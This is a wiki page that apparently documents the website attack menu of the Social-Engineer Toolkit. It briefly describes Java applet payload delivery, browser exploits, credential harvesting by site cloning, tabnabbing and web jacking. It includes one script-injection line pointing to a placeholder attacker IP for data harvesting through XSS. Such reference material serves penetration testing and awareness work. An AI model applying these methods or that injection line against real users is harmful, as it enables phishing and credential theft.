Social-Engineer-Toolkit-SET/Social-Engineering-Attacks/Website-Attack-Vectors

From aldeid
Jump to navigation Jump to search
You are here:
Website Attack Vectors
Java Applet Attack Method
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
Metasploit Browser Exploit Method
The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
Credential Harvester Attack Method
The Credential Harvester method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.
Tabnabbing Attack Method
The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
Man Left in the Middle Attack Method
The Man Left in the Middle Attack method was introduced by Kos and utilizes HTTP REFERER's in order to intercept fields and harvest data from them. You need to have an already vulnerable site and incorporate <script src="http://YOURIP/">. This could either be from a compromised site or through XSS.
Web Jacking Attack Method
The Web-Jacking Attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
Multi-Attack Web Method
The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.
Victim Web Profiler
Create or import a CodeSigning Certificate